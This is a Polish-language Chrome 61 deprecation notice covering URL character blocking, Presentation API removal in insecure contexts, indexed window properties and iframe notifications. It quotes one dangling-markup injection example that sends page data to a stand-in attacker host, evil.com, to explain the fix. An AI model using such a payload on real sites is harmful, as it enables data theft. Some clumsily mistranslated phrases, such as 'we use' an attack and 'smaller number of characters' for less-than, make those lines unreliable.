W niemal każdej wersji Chrome obserwujemy znaczną liczbę aktualizacji i ulepszeń produktu, jego wydajności, a także możliwości platformy internetowej. W tym artykule opisujemy wycofywanie i usuwanie wersji Chrome 61, która od 3 sierpnia znajduje się w fazie beta. Ta lista może się w każdej chwili zmienić.
Prywatność i bezpieczeństwo
Blokuj zasoby, których adresy URL zawierają znaki „\n” i „<”
Stosujemy rodzaj ataku hakerskiego zwanego wstrzyknięciem znaczników, w którym skrócony adres URL służy do wysyłania danych do zewnętrznego punktu końcowego. Weźmy za przykład stronę zawierającą element <img src='https://evil.com/?. Adres URL nie zawiera cudzysłowu zamykającego, dlatego przeglądarki odczytają do następnego cudzysłowu i potraktują zawarte w nim znaki tak, jakby były pojedynczymi adresami URL.
Chrome 61 eliminuje tę lukę w zabezpieczeniach, ograniczając zestawy znaków dozwolone w atrybutach href i src. W szczególności Chrome zatrzyma przetwarzanie adresów URL, gdy napotka znaki nowego wiersza (\n) i mniej niż znaki (<).
Deweloperzy, którzy w uzasadnionych przypadkach używają nowego wiersza i mają w adresie URL mniejszą liczbę znaków, powinni zamiast tego używać znaczenia tych znaków.
Intencja usunięcia | Narzędzie do śledzenia stanu Chrome | Błąd Chromium
Wycofanie i usunięcie interfejsu Presentation API w niezabezpieczonych kontekstach
Stwierdzono, że w przypadku niezabezpieczonych źródeł interfejs Prezentacja API może służyć jako wektor hakerski w niezabezpieczonych źródłach. Ponieważ wyświetlacze nie mają pasków adresu, interfejs API może służyć do podszywania się pod inne treści. Można też wydobyć dane z prowadzonych prezentacji.
Zgodnie z zamierzeniem firmy Blink usunięcie zaawansowanych funkcji w niezabezpieczonych źródłach planujemy wycofać i usunięcie obsługi interfejsu Presentation API w niezabezpieczonych kontekstach. Od Chrome 61 PresentationRequest.start() nie będzie już działać w przypadku niezabezpieczonych źródeł.
Intencja usunięcia | Narzędzie do śledzenia stanu Chrome | Błąd Chromium
JavaScript
Nie zezwalaj na definiowanie właściwości zindeksowanych w oknach
Wcześniej niektóre przeglądarki zezwalały na przypisywanie kodu JavaScript, jak na przykład poniżej:
window[0] = 1;
Aktualne specyfikacje HTML wskazują, że stanowi to wyraźne naruszenie specyfikacji JavaScriptu. W związku z tym w Chrome 61 ta możliwość została usunięta. Od lutego 2016 r. przeglądarka Firefox jest zgodna z zasadami.
Usuń korzystanie z powiadomień z niezabezpieczonych elementów iframe
Prośby o przyznanie uprawnień z elementów iframe mogą wprowadzać użytkowników w błąd, ponieważ trudno jest odróżnić źródło strony zawierającej stronę od źródła elementu iframe, który wysyła żądanie. Gdy zakres żądań jest niejasny, użytkownicy mają trudności z rozstrzygnięciem, czy przyznać lub odebrać uprawnienia.
Wyłączenie powiadomień w elementach iframe spowoduje też dostosowanie wymagań dotyczących uprawnień do powiadomień z wymaganiami dotyczącymi powiadomień push, co ułatwi deweloperom pracę.
Deweloperzy, którzy potrzebują tej funkcji, mogą otworzyć nowe okno i poprosić o zgodę na wysyłanie powiadomień.
Intencja usunięcia | Narzędzie do śledzenia stanu Chrome | Błąd Chromium